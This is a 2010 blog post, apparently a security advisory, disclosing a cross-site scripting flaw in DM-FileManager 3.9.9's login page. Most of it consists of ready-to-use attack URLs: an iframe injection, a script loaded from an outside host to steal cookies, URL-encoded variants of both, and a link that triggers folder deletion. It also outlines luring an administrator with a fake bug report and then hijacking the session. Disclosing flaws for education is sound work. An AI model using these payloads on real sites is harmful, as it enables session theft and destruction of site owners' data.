Archive for January, 2010
You are currently browsing the nDarkness blog archives for January, 2010.
30
Jan
2010
DM-FileManager 3.9.9 XSS Vulnerability
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.
This example shows nDarkness.com in an iframe within the login page:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
and one step farther is the cookie stealer script:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E
A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.
Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin
DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.
GHTime Code(s): 262b5 e4f3d f515c nc